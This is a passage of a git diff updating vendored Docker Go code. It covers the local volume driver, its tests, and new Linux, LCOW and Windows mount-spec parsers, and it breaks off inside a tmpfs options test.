@@ -341,7 +355,7 @@ func (v *localVolume) Unmount(id string) error {
 func validateOpts(opts map[string]string) error {
 	for opt := range opts {
 		if !validOpts[opt] {
-			return validationError{fmt.Errorf("invalid option key: %q", opt)}
+			return validationError(fmt.Sprintf("invalid option key: %q", opt))
 		}
 	}
 	return nil
@@ -356,7 +370,7 @@ func getAddress(opts string) string {
 	optsList := strings.Split(opts, ",")
 	for i := 0; i < len(optsList); i++ {
 		if strings.HasPrefix(optsList[i], "addr=") {
-			addr := (strings.SplitN(optsList[i], "=", 2)[1])
+			addr := strings.SplitN(optsList[i], "=", 2)[1]
 			return addr
 		}
 	}
diff --git a/vendor/github.com/docker/docker/volume/local/local_test.go b/vendor/github.com/docker/docker/volume/local/local_test.go
index f5a519b883..4cb47ba045 100644
--- a/vendor/github.com/docker/docker/volume/local/local_test.go
+++ b/vendor/github.com/docker/docker/volume/local/local_test.go
@@ -1,4 +1,4 @@
-package local
+package local // import "github.com/docker/docker/volume/local"
 
 import (
 	"io/ioutil"
@@ -9,7 +9,9 @@ import (
 	"strings"
 	"testing"
 
+	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/mount"
+	"gotest.tools/skip"
 )
 
 func TestGetAddress(t *testing.T) {
@@ -29,18 +31,14 @@ func TestGetAddress(t *testing.T) {
 }
 
 func TestRemove(t *testing.T) {
-	// TODO Windows: Investigate why this test fails on Windows under CI
-	//               but passes locally.
-	if runtime.GOOS == "windows" {
-		t.Skip("Test failing on Windows CI")
-	}
+	skip.If(t, runtime.GOOS == "windows", "FIXME: investigate why this test fails on CI")
 	rootDir, err := ioutil.TempDir("", "local-volume-test")
 	if err != nil {
 		t.Fatal(err)
 	}
 	defer os.RemoveAll(rootDir)
 
-	r, err := New(rootDir, 0, 0)
+	r, err := New(rootDir, idtools.IDPair{UID: os.Geteuid(), GID: os.Getegid()})
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -82,7 +80,7 @@ func TestInitializeWithVolumes(t *testing.T) {
 	}
 	defer os.RemoveAll(rootDir)
 
-	r, err := New(rootDir, 0, 0)
+	r, err := New(rootDir, idtools.IDPair{UID: os.Geteuid(), GID: os.Getegid()})
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -92,7 +90,7 @@ func TestInitializeWithVolumes(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	r, err = New(rootDir, 0, 0)
+	r, err = New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()})
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -114,7 +112,7 @@ func TestCreate(t *testing.T) {
 	}
 	defer os.RemoveAll(rootDir)
 
-	r, err := New(rootDir, 0, 0)
+	r, err := New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()})
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -151,7 +149,7 @@ func TestCreate(t *testing.T) {
 		}
 	}
 
-	r, err = New(rootDir, 0, 0)
+	r, err = New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()})
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -180,16 +178,15 @@ func TestValidateName(t *testing.T) {
 }
 
 func TestCreateWithOpts(t *testing.T) {
-	if runtime.GOOS == "windows" || runtime.GOOS == "solaris" {
-		t.Skip()
-	}
+	skip.If(t, runtime.GOOS == "windows")
+	skip.If(t, os.Getuid() != 0, "requires mounts")
 	rootDir, err := ioutil.TempDir("", "local-volume-test")
 	if err != nil {
 		t.Fatal(err)
 	}
 	defer os.RemoveAll(rootDir)
 
-	r, err := New(rootDir, 0, 0)
+	r, err := New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()})
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -214,33 +211,27 @@ func TestCreateWithOpts(t *testing.T) {
 		}
 	}()
 
-	mountInfos, err := mount.GetMounts()
+	mountInfos, err := mount.GetMounts(mount.SingleEntryFilter(dir))
 	if err != nil {
 		t.Fatal(err)
 	}
-
-	var found bool
-	for _, info := range mountInfos {
-		if info.Mountpoint == dir {
-			found = true
-			if info.Fstype != "tmpfs" {
-				t.Fatalf("expected tmpfs mount, got %q", info.Fstype)
-			}
-			if info.Source != "tmpfs" {
-				t.Fatalf("expected tmpfs mount, got %q", info.Source)
-			}
-			if !strings.Contains(info.VfsOpts, "uid=1000") {
-				t.Fatalf("expected mount info to have uid=1000: %q", info.VfsOpts)
-			}
-			if !strings.Contains(info.VfsOpts, "size=1024k") {
-				t.Fatalf("expected mount info to have size=1024k: %q", info.VfsOpts)
-			}
-			break
-		}
+	if len(mountInfos) != 1 {
+		t.Fatalf("expected 1 mount, found %d: %+v", len(mountInfos), mountInfos)
 	}
 
-	if !found {
-		t.Fatal("mount not found")
+	info := mountInfos[0]
+	t.Logf("%+v", info)
+	if info.Fstype != "tmpfs" {
+		t.Fatalf("expected tmpfs mount, got %q", info.Fstype)
+	}
+	if info.Source != "tmpfs" {
+		t.Fatalf("expected tmpfs mount, got %q", info.Source)
+	}
+	if !strings.Contains(info.VfsOpts, "uid=1000") {
+		t.Fatalf("expected mount info to have uid=1000: %q", info.VfsOpts)
+	}
+	if !strings.Contains(info.VfsOpts, "size=1024k") {
+		t.Fatalf("expected mount info to have size=1024k: %q", info.VfsOpts)
 	}
 
 	if v.active.count != 1 {
@@ -270,7 +261,7 @@ func TestCreateWithOpts(t *testing.T) {
 		t.Fatal("expected mount to still be active")
 	}
 
-	r, err = New(rootDir, 0, 0)
+	r, err = New(rootDir, idtools.IDPair{UID: 0, GID: 0})
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -285,14 +276,14 @@ func TestCreateWithOpts(t *testing.T) {
 	}
 }
 
-func TestRealodNoOpts(t *testing.T) {
+func TestRelaodNoOpts(t *testing.T) {
 	rootDir, err := ioutil.TempDir("", "volume-test-reload-no-opts")
 	if err != nil {
 		t.Fatal(err)
 	}
 	defer os.RemoveAll(rootDir)
 
-	r, err := New(rootDir, 0, 0)
+	r, err := New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()})
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -320,7 +311,7 @@ func TestRealodNoOpts(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	r, err = New(rootDir, 0, 0)
+	r, err = New(rootDir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()})
 	if err != nil {
 		t.Fatal(err)
 	}
diff --git a/vendor/github.com/docker/docker/volume/local/local_unix.go b/vendor/github.com/docker/docker/volume/local/local_unix.go
index fb08862cef..b1c68b931b 100644
--- a/vendor/github.com/docker/docker/volume/local/local_unix.go
+++ b/vendor/github.com/docker/docker/volume/local/local_unix.go
@@ -1,15 +1,18 @@
-// +build linux freebsd solaris
+// +build linux freebsd
 
 // Package local provides the default implementation for volumes. It
 // is used to mount data volume containers and directories local to
 // the host server.
-package local
+package local // import "github.com/docker/docker/volume/local"
 
 import (
 	"fmt"
 	"net"
+	"os"
 	"path/filepath"
 	"strings"
+	"syscall"
+	"time"
 
 	"github.com/pkg/errors"
 
@@ -85,3 +88,12 @@ func (v *localVolume) mount() error {
 	err := mount.Mount(v.opts.MountDevice, v.path, v.opts.MountType, mountOpts)
 	return errors.Wrapf(err, "error while mounting volume with options: %s", v.opts)
 }
+
+func (v *localVolume) CreatedAt() (time.Time, error) {
+	fileInfo, err := os.Stat(v.path)
+	if err != nil {
+		return time.Time{}, err
+	}
+	sec, nsec := fileInfo.Sys().(*syscall.Stat_t).Ctim.Unix()
+	return time.Unix(sec, nsec), nil
+}
diff --git a/vendor/github.com/docker/docker/volume/local/local_windows.go b/vendor/github.com/docker/docker/volume/local/local_windows.go
index 1bdb368a0f..d96fc0f594 100644
--- a/vendor/github.com/docker/docker/volume/local/local_windows.go
+++ b/vendor/github.com/docker/docker/volume/local/local_windows.go
@@ -1,12 +1,15 @@
 // Package local provides the default implementation for volumes. It
 // is used to mount data volume containers and directories local to
 // the host server.
-package local
+package local // import "github.com/docker/docker/volume/local"
 
 import (
 	"fmt"
+	"os"
 	"path/filepath"
 	"strings"
+	"syscall"
+	"time"
 )
 
 type optsConfig struct{}
@@ -32,3 +35,12 @@ func setOpts(v *localVolume, opts map[string]string) error {
 func (v *localVolume) mount() error {
 	return nil
 }
+
+func (v *localVolume) CreatedAt() (time.Time, error) {
+	fileInfo, err := os.Stat(v.path)
+	if err != nil {
+		return time.Time{}, err
+	}
+	ft := fileInfo.Sys().(*syscall.Win32FileAttributeData).CreationTime
+	return time.Unix(0, ft.Nanoseconds()), nil
+}
diff --git a/vendor/github.com/docker/docker/volume/mounts/lcow_parser.go b/vendor/github.com/docker/docker/volume/mounts/lcow_parser.go
new file mode 100644
index 0000000000..bafb7b07f8
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/mounts/lcow_parser.go
@@ -0,0 +1,34 @@
+package mounts // import "github.com/docker/docker/volume/mounts"
+
+import (
+	"errors"
+	"path"
+
+	"github.com/docker/docker/api/types/mount"
+)
+
+var lcowSpecificValidators mountValidator = func(m *mount.Mount) error {
+	if path.Clean(m.Target) == "/" {
+		return ErrVolumeTargetIsRoot
+	}
+	if m.Type == mount.TypeNamedPipe {
+		return errors.New("Linux containers on Windows do not support named pipe mounts")
+	}
+	return nil
+}
+
+type lcowParser struct {
+	windowsParser
+}
+
+func (p *lcowParser) ValidateMountConfig(mnt *mount.Mount) error {
+	return p.validateMountConfigReg(mnt, rxLCOWDestination, lcowSpecificValidators)
+}
+
+func (p *lcowParser) ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) {
+	return p.parseMountRaw(raw, volumeDriver, rxLCOWDestination, false, lcowSpecificValidators)
+}
+
+func (p *lcowParser) ParseMountSpec(cfg mount.Mount) (*MountPoint, error) {
+	return p.parseMountSpec(cfg, rxLCOWDestination, false, lcowSpecificValidators)
+}
diff --git a/vendor/github.com/docker/docker/volume/mounts/linux_parser.go b/vendor/github.com/docker/docker/volume/mounts/linux_parser.go
new file mode 100644
index 0000000000..8e436aec0e
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/mounts/linux_parser.go
@@ -0,0 +1,417 @@
+package mounts // import "github.com/docker/docker/volume/mounts"
+
+import (
+	"errors"
+	"fmt"
+	"path"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/volume"
+)
+
+type linuxParser struct {
+}
+
+func linuxSplitRawSpec(raw string) ([]string, error) {
+	if strings.Count(raw, ":") > 2 {
+		return nil, errInvalidSpec(raw)
+	}
+
+	arr := strings.SplitN(raw, ":", 3)
+	if arr[0] == "" {
+		return nil, errInvalidSpec(raw)
+	}
+	return arr, nil
+}
+
+func linuxValidateNotRoot(p string) error {
+	p = path.Clean(strings.Replace(p, `\`, `/`, -1))
+	if p == "/" {
+		return ErrVolumeTargetIsRoot
+	}
+	return nil
+}
+func linuxValidateAbsolute(p string) error {
+	p = strings.Replace(p, `\`, `/`, -1)
+	if path.IsAbs(p) {
+		return nil
+	}
+	return fmt.Errorf("invalid mount path: '%s' mount path must be absolute", p)
+}
+func (p *linuxParser) ValidateMountConfig(mnt *mount.Mount) error {
+	// there was something looking like a bug in existing codebase:
+	// - validateMountConfig on linux was called with options skipping bind source existence when calling ParseMountRaw
+	// - but not when calling ParseMountSpec directly... nor when the unit test called it directly
+	return p.validateMountConfigImpl(mnt, true)
+}
+func (p *linuxParser) validateMountConfigImpl(mnt *mount.Mount, validateBindSourceExists bool) error {
+	if len(mnt.Target) == 0 {
+		return &errMountConfig{mnt, errMissingField("Target")}
+	}
+
+	if err := linuxValidateNotRoot(mnt.Target); err != nil {
+		return &errMountConfig{mnt, err}
+	}
+
+	if err := linuxValidateAbsolute(mnt.Target); err != nil {
+		return &errMountConfig{mnt, err}
+	}
+
+	switch mnt.Type {
+	case mount.TypeBind:
+		if len(mnt.Source) == 0 {
+			return &errMountConfig{mnt, errMissingField("Source")}
+		}
+		// Don't error out just because the propagation mode is not supported on the platform
+		if opts := mnt.BindOptions; opts != nil {
+			if len(opts.Propagation) > 0 && len(linuxPropagationModes) > 0 {
+				if _, ok := linuxPropagationModes[opts.Propagation]; !ok {
+					return &errMountConfig{mnt, fmt.Errorf("invalid propagation mode: %s", opts.Propagation)}
+				}
+			}
+		}
+		if mnt.VolumeOptions != nil {
+			return &errMountConfig{mnt, errExtraField("VolumeOptions")}
+		}
+
+		if err := linuxValidateAbsolute(mnt.Source); err != nil {
+			return &errMountConfig{mnt, err}
+		}
+
+		if validateBindSourceExists {
+			exists, _, _ := currentFileInfoProvider.fileInfo(mnt.Source)
+			if !exists {
+				return &errMountConfig{mnt, errBindSourceDoesNotExist(mnt.Source)}
+			}
+		}
+
+	case mount.TypeVolume:
+		if mnt.BindOptions != nil {
+			return &errMountConfig{mnt, errExtraField("BindOptions")}
+		}
+
+		if len(mnt.Source) == 0 && mnt.ReadOnly {
+			return &errMountConfig{mnt, fmt.Errorf("must not set ReadOnly mode when using anonymous volumes")}
+		}
+	case mount.TypeTmpfs:
+		if len(mnt.Source) != 0 {
+			return &errMountConfig{mnt, errExtraField("Source")}
+		}
+		if _, err := p.ConvertTmpfsOptions(mnt.TmpfsOptions, mnt.ReadOnly); err != nil {
+			return &errMountConfig{mnt, err}
+		}
+	default:
+		return &errMountConfig{mnt, errors.New("mount type unknown")}
+	}
+	return nil
+}
+
+// read-write modes
+var rwModes = map[string]bool{
+	"rw": true,
+	"ro": true,
+}
+
+// label modes
+var linuxLabelModes = map[string]bool{
+	"Z": true,
+	"z": true,
+}
+
+// consistency modes
+var linuxConsistencyModes = map[mount.Consistency]bool{
+	mount.ConsistencyFull:      true,
+	mount.ConsistencyCached:    true,
+	mount.ConsistencyDelegated: true,
+}
+var linuxPropagationModes = map[mount.Propagation]bool{
+	mount.PropagationPrivate:  true,
+	mount.PropagationRPrivate: true,
+	mount.PropagationSlave:    true,
+	mount.PropagationRSlave:   true,
+	mount.PropagationShared:   true,
+	mount.PropagationRShared:  true,
+}
+
+const linuxDefaultPropagationMode = mount.PropagationRPrivate
+
+func linuxGetPropagation(mode string) mount.Propagation {
+	for _, o := range strings.Split(mode, ",") {
+		prop := mount.Propagation(o)
+		if linuxPropagationModes[prop] {
+			return prop
+		}
+	}
+	return linuxDefaultPropagationMode
+}
+
+func linuxHasPropagation(mode string) bool {
+	for _, o := range strings.Split(mode, ",") {
+		if linuxPropagationModes[mount.Propagation(o)] {
+			return true
+		}
+	}
+	return false
+}
+
+func linuxValidMountMode(mode string) bool {
+	if mode == "" {
+		return true
+	}
+
+	rwModeCount := 0
+	labelModeCount := 0
+	propagationModeCount := 0
+	copyModeCount := 0
+	consistencyModeCount := 0
+
+	for _, o := range strings.Split(mode, ",") {
+		switch {
+		case rwModes[o]:
+			rwModeCount++
+		case linuxLabelModes[o]:
+			labelModeCount++
+		case linuxPropagationModes[mount.Propagation(o)]:
+			propagationModeCount++
+		case copyModeExists(o):
+			copyModeCount++
+		case linuxConsistencyModes[mount.Consistency(o)]:
+			consistencyModeCount++
+		default:
+			return false
+		}
+	}
+
+	// Only one string for each mode is allowed.
+	if rwModeCount > 1 || labelModeCount > 1 || propagationModeCount > 1 || copyModeCount > 1 || consistencyModeCount > 1 {
+		return false
+	}
+	return true
+}
+
+func (p *linuxParser) ReadWrite(mode string) bool {
+	if !linuxValidMountMode(mode) {
+		return false
+	}
+
+	for _, o := range strings.Split(mode, ",") {
+		if o == "ro" {
+			return false
+		}
+	}
+	return true
+}
+
+func (p *linuxParser) ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) {
+	arr, err := linuxSplitRawSpec(raw)
+	if err != nil {
+		return nil, err
+	}
+
+	var spec mount.Mount
+	var mode string
+	switch len(arr) {
+	case 1:
+		// Just a destination path in the container
+		spec.Target = arr[0]
+	case 2:
+		if linuxValidMountMode(arr[1]) {
+			// Destination + Mode is not a valid volume - volumes
+			// cannot include a mode. e.g. /foo:rw
+			return nil, errInvalidSpec(raw)
+		}
+		// Host Source Path or Name + Destination
+		spec.Source = arr[0]
+		spec.Target = arr[1]
+	case 3:
+		// HostSourcePath+DestinationPath+Mode
+		spec.Source = arr[0]
+		spec.Target = arr[1]
+		mode = arr[2]
+	default:
+		return nil, errInvalidSpec(raw)
+	}
+
+	if !linuxValidMountMode(mode) {
+		return nil, errInvalidMode(mode)
+	}
+
+	if path.IsAbs(spec.Source) {
+		spec.Type = mount.TypeBind
+	} else {
+		spec.Type = mount.TypeVolume
+	}
+
+	spec.ReadOnly = !p.ReadWrite(mode)
+
+	// cannot assume that if a volume driver is passed in that we should set it
+	if volumeDriver != "" && spec.Type == mount.TypeVolume {
+		spec.VolumeOptions = &mount.VolumeOptions{
+			DriverConfig: &mount.Driver{Name: volumeDriver},
+		}
+	}
+
+	if copyData, isSet := getCopyMode(mode, p.DefaultCopyMode()); isSet {
+		if spec.VolumeOptions == nil {
+			spec.VolumeOptions = &mount.VolumeOptions{}
+		}
+		spec.VolumeOptions.NoCopy = !copyData
+	}
+	if linuxHasPropagation(mode) {
+		spec.BindOptions = &mount.BindOptions{
+			Propagation: linuxGetPropagation(mode),
+		}
+	}
+
+	mp, err := p.parseMountSpec(spec, false)
+	if mp != nil {
+		mp.Mode = mode
+	}
+	if err != nil {
+		err = fmt.Errorf("%v: %v", errInvalidSpec(raw), err)
+	}
+	return mp, err
+}
+func (p *linuxParser) ParseMountSpec(cfg mount.Mount) (*MountPoint, error) {
+	return p.parseMountSpec(cfg, true)
+}
+func (p *linuxParser) parseMountSpec(cfg mount.Mount, validateBindSourceExists bool) (*MountPoint, error) {
+	if err := p.validateMountConfigImpl(&cfg, validateBindSourceExists); err != nil {
+		return nil, err
+	}
+	mp := &MountPoint{
+		RW:          !cfg.ReadOnly,
+		Destination: path.Clean(filepath.ToSlash(cfg.Target)),
+		Type:        cfg.Type,
+		Spec:        cfg,
+	}
+
+	switch cfg.Type {
+	case mount.TypeVolume:
+		if cfg.Source == "" {
+			mp.Name = stringid.GenerateNonCryptoID()
+		} else {
+			mp.Name = cfg.Source
+		}
+		mp.CopyData = p.DefaultCopyMode()
+
+		if cfg.VolumeOptions != nil {
+			if cfg.VolumeOptions.DriverConfig != nil {
+				mp.Driver = cfg.VolumeOptions.DriverConfig.Name
+			}
+			if cfg.VolumeOptions.NoCopy {
+				mp.CopyData = false
+			}
+		}
+	case mount.TypeBind:
+		mp.Source = path.Clean(filepath.ToSlash(cfg.Source))
+		if cfg.BindOptions != nil && len(cfg.BindOptions.Propagation) > 0 {
+			mp.Propagation = cfg.BindOptions.Propagation
+		} else {
+			// If user did not specify a propagation mode, get
+			// default propagation mode.
+			mp.Propagation = linuxDefaultPropagationMode
+		}
+	case mount.TypeTmpfs:
+		// NOP
+	}
+	return mp, nil
+}
+
+func (p *linuxParser) ParseVolumesFrom(spec string) (string, string, error) {
+	if len(spec) == 0 {
+		return "", "", fmt.Errorf("volumes-from specification cannot be an empty string")
+	}
+
+	specParts := strings.SplitN(spec, ":", 2)
+	id := specParts[0]
+	mode := "rw"
+
+	if len(specParts) == 2 {
+		mode = specParts[1]
+		if !linuxValidMountMode(mode) {
+			return "", "", errInvalidMode(mode)
+		}
+		// For now don't allow propagation properties while importing
+		// volumes from data container. These volumes will inherit
+		// the same propagation property as of the original volume
+		// in data container. This probably can be relaxed in future.
+		if linuxHasPropagation(mode) {
+			return "", "", errInvalidMode(mode)
+		}
+		// Do not allow copy modes on volumes-from
+		if _, isSet := getCopyMode(mode, p.DefaultCopyMode()); isSet {
+			return "", "", errInvalidMode(mode)
+		}
+	}
+	return id, mode, nil
+}
+
+func (p *linuxParser) DefaultPropagationMode() mount.Propagation {
+	return linuxDefaultPropagationMode
+}
+
+func (p *linuxParser) ConvertTmpfsOptions(opt *mount.TmpfsOptions, readOnly bool) (string, error) {
+	var rawOpts []string
+	if readOnly {
+		rawOpts = append(rawOpts, "ro")
+	}
+
+	if opt != nil && opt.Mode != 0 {
+		rawOpts = append(rawOpts, fmt.Sprintf("mode=%o", opt.Mode))
+	}
+
+	if opt != nil && opt.SizeBytes != 0 {
+		// calculate suffix here, making this linux specific, but that is
+		// okay, since API is that way anyways.
+
+		// we do this by finding the suffix that divides evenly into the
+		// value, returning the value itself, with no suffix, if it fails.
+		//
+		// For the most part, we don't enforce any semantic to this values.
+		// The operating system will usually align this and enforce minimum
+		// and maximums.
+		var (
+			size   = opt.SizeBytes
+			suffix string
+		)
+		for _, r := range []struct {
+			suffix  string
+			divisor int64
+		}{
+			{"g", 1 << 30},
+			{"m", 1 << 20},
+			{"k", 1 << 10},
+		} {
+			if size%r.divisor == 0 {
+				size = size / r.divisor
+				suffix = r.suffix
+				break
+			}
+		}
+
+		rawOpts = append(rawOpts, fmt.Sprintf("size=%d%s", size, suffix))
+	}
+	return strings.Join(rawOpts, ","), nil
+}
+
+func (p *linuxParser) DefaultCopyMode() bool {
+	return true
+}
+func (p *linuxParser) ValidateVolumeName(name string) error {
+	return nil
+}
+
+func (p *linuxParser) IsBackwardCompatible(m *MountPoint) bool {
+	return len(m.Source) > 0 || m.Driver == volume.DefaultDriverName
+}
+
+func (p *linuxParser) ValidateTmpfsMountDestination(dest string) error {
+	if err := linuxValidateNotRoot(dest); err != nil {
+		return err
+	}
+	return linuxValidateAbsolute(dest)
+}
diff --git a/vendor/github.com/docker/docker/volume/mounts/mounts.go b/vendor/github.com/docker/docker/volume/mounts/mounts.go
new file mode 100644
index 0000000000..8f255a5482
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/mounts/mounts.go
@@ -0,0 +1,170 @@
+package mounts // import "github.com/docker/docker/volume/mounts"
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"syscall"
+
+	mounttypes "github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/volume"
+	"github.com/opencontainers/selinux/go-selinux/label"
+	"github.com/pkg/errors"
+)
+
+// MountPoint is the intersection point between a volume and a container. It
+// specifies which volume is to be used and where inside a container it should
+// be mounted.
+//
+// Note that this type is embedded in `container.Container` object and persisted to disk.
+// Changes to this struct need to by synced with on disk state.
+type MountPoint struct {
+	// Source is the source path of the mount.
+	// E.g. `mount --bind /foo /bar`, `/foo` is the `Source`.
+	Source string
+	// Destination is the path relative to the container root (`/`) to the mount point
+	// It is where the `Source` is mounted to
+	Destination string
+	// RW is set to true when the mountpoint should be mounted as read-write
+	RW bool
+	// Name is the name reference to the underlying data defined by `Source`
+	// e.g., the volume name
+	Name string
+	// Driver is the volume driver used to create the volume (if it is a volume)
+	Driver string
+	// Type of mount to use, see `Type<foo>` definitions in github.com/docker/docker/api/types/mount
+	Type mounttypes.Type `json:",omitempty"`
+	// Volume is the volume providing data to this mountpoint.
+	// This is nil unless `Type` is set to `TypeVolume`
+	Volume volume.Volume `json:"-"`
+
+	// Mode is the comma separated list of options supplied by the user when creating
+	// the bind/volume mount.
+	// Note Mode is not used on Windows
+	Mode string `json:"Relabel,omitempty"` // Originally field was `Relabel`"
+
+	// Propagation describes how the mounts are propagated from the host into the
+	// mount point, and vice-versa.
+	// See https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt
+	// Note Propagation is not used on Windows
+	Propagation mounttypes.Propagation `json:",omitempty"` // Mount propagation string
+
+	// Specifies if data should be copied from the container before the first mount
+	// Use a pointer here so we can tell if the user set this value explicitly
+	// This allows us to error out when the user explicitly enabled copy but we can't copy due to the volume being populated
+	CopyData bool `json:"-"`
+	// ID is the opaque ID used to pass to the volume driver.
+	// This should be set by calls to `Mount` and unset by calls to `Unmount`
+	ID string `json:",omitempty"`
+
+	// Sepc is a copy of the API request that created this mount.
+	Spec mounttypes.Mount
+
+	// Track usage of this mountpoint
+	// Specifically needed for containers which are running and calls to `docker cp`
+	// because both these actions require mounting the volumes.
+	active int
+}
+
+// Cleanup frees resources used by the mountpoint
+func (m *MountPoint) Cleanup() error {
+	if m.Volume == nil || m.ID == "" {
+		return nil
+	}
+
+	if err := m.Volume.Unmount(m.ID); err != nil {
+		return errors.Wrapf(err, "error unmounting volume %s", m.Volume.Name())
+	}
+
+	m.active--
+	if m.active == 0 {
+		m.ID = ""
+	}
+	return nil
+}
+
+// Setup sets up a mount point by either mounting the volume if it is
+// configured, or creating the source directory if supplied.
+// The, optional, checkFun parameter allows doing additional checking
+// before creating the source directory on the host.
+func (m *MountPoint) Setup(mountLabel string, rootIDs idtools.IDPair, checkFun func(m *MountPoint) error) (path string, err error) {
+	defer func() {
+		if err != nil || !label.RelabelNeeded(m.Mode) {
+			return
+		}
+
+		var sourcePath string
+		sourcePath, err = filepath.EvalSymlinks(m.Source)
+		if err != nil {
+			path = ""
+			err = errors.Wrapf(err, "error evaluating symlinks from mount source %q", m.Source)
+			return
+		}
+		err = label.Relabel(sourcePath, mountLabel, label.IsShared(m.Mode))
+		if err == syscall.ENOTSUP {
+			err = nil
+		}
+		if err != nil {
+			path = ""
+			err = errors.Wrapf(err, "error setting label on mount source '%s'", sourcePath)
+		}
+	}()
+
+	if m.Volume != nil {
+		id := m.ID
+		if id == "" {
+			id = stringid.GenerateNonCryptoID()
+		}
+		path, err := m.Volume.Mount(id)
+		if err != nil {
+			return "", errors.Wrapf(err, "error while mounting volume '%s'", m.Source)
+		}
+
+		m.ID = id
+		m.active++
+		return path, nil
+	}
+
+	if len(m.Source) == 0 {
+		return "", fmt.Errorf("Unable to setup mount point, neither source nor volume defined")
+	}
+
+	if m.Type == mounttypes.TypeBind {
+		// Before creating the source directory on the host, invoke checkFun if it's not nil. One of
+		// the use case is to forbid creating the daemon socket as a directory if the daemon is in
+		// the process of shutting down.
+		if checkFun != nil {
+			if err := checkFun(m); err != nil {
+				return "", err
+			}
+		}
+		// idtools.MkdirAllNewAs() produces an error if m.Source exists and is a file (not a directory)
+		// also, makes sure that if the directory is created, the correct remapped rootUID/rootGID will own it
+		if err := idtools.MkdirAllAndChownNew(m.Source, 0755, rootIDs); err != nil {
+			if perr, ok := err.(*os.PathError); ok {
+				if perr.Err != syscall.ENOTDIR {
+					return "", errors.Wrapf(err, "error while creating mount source path '%s'", m.Source)
+				}
+			}
+		}
+	}
+	return m.Source, nil
+}
+
+// Path returns the path of a volume in a mount point.
+func (m *MountPoint) Path() string {
+	if m.Volume != nil {
+		return m.Volume.Path()
+	}
+	return m.Source
+}
+
+func errInvalidMode(mode string) error {
+	return errors.Errorf("invalid mode: %v", mode)
+}
+
+func errInvalidSpec(spec string) error {
+	return errors.Errorf("invalid volume specification: '%s'", spec)
+}
diff --git a/vendor/github.com/docker/docker/volume/mounts/parser.go b/vendor/github.com/docker/docker/volume/mounts/parser.go
new file mode 100644
index 0000000000..73681750ea
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/mounts/parser.go
@@ -0,0 +1,47 @@
+package mounts // import "github.com/docker/docker/volume/mounts"
+
+import (
+	"errors"
+	"runtime"
+
+	"github.com/docker/docker/api/types/mount"
+)
+
+const (
+	// OSLinux is the same as runtime.GOOS on linux
+	OSLinux = "linux"
+	// OSWindows is the same as runtime.GOOS on windows
+	OSWindows = "windows"
+)
+
+// ErrVolumeTargetIsRoot is returned when the target destination is root.
+// It's used by both LCOW and Linux parsers.
+var ErrVolumeTargetIsRoot = errors.New("invalid specification: destination can't be '/'")
+
+// Parser represents a platform specific parser for mount expressions
+type Parser interface {
+	ParseMountRaw(raw, volumeDriver string) (*MountPoint, error)
+	ParseMountSpec(cfg mount.Mount) (*MountPoint, error)
+	ParseVolumesFrom(spec string) (string, string, error)
+	DefaultPropagationMode() mount.Propagation
+	ConvertTmpfsOptions(opt *mount.TmpfsOptions, readOnly bool) (string, error)
+	DefaultCopyMode() bool
+	ValidateVolumeName(name string) error
+	ReadWrite(mode string) bool
+	IsBackwardCompatible(m *MountPoint) bool
+	HasResource(m *MountPoint, absPath string) bool
+	ValidateTmpfsMountDestination(dest string) error
+	ValidateMountConfig(mt *mount.Mount) error
+}
+
+// NewParser creates a parser for a given container OS, depending on the current host OS (linux on a windows host will resolve to an lcowParser)
+func NewParser(containerOS string) Parser {
+	switch containerOS {
+	case OSWindows:
+		return &windowsParser{}
+	}
+	if runtime.GOOS == OSWindows {
+		return &lcowParser{}
+	}
+	return &linuxParser{}
+}
diff --git a/vendor/github.com/docker/docker/volume/mounts/parser_test.go b/vendor/github.com/docker/docker/volume/mounts/parser_test.go
new file mode 100644
index 0000000000..347f7d9c4d
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/mounts/parser_test.go
@@ -0,0 +1,480 @@
+package mounts // import "github.com/docker/docker/volume/mounts"
+
+import (
+	"io/ioutil"
+	"os"
+	"runtime"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/mount"
+)
+
+type parseMountRawTestSet struct {
+	valid   []string
+	invalid map[string]string
+}
+
+func TestConvertTmpfsOptions(t *testing.T) {
+	type testCase struct {
+		opt                  mount.TmpfsOptions
+		readOnly             bool
+		expectedSubstrings   []string
+		unexpectedSubstrings []string
+	}
+	cases := []testCase{
+		{
+			opt:                  mount.TmpfsOptions{SizeBytes: 1024 * 1024, Mode: 0700},
+			readOnly:             false,
+			expectedSubstrings:   []string{"size=1m", "mode=700"},
+			unexpectedSubstrings: []string{"ro"},
+		},
+		{
+			opt:                  mount.TmpfsOptions{},
+			readOnly:             true,
+			expectedSubstrings:   []string{"ro"},
+			unexpectedSubstrings: []string{},
+		},
+	}
+	p := &linuxParser{}
+	for _, c := range cases {
+		data, err := p.ConvertTmpfsOptions(&c.opt, c.readOnly)
+		if err != nil {
+			t.Fatalf("could not convert %+v (readOnly: %v) to string: %v",
+				c.opt, c.readOnly, err)
+		}
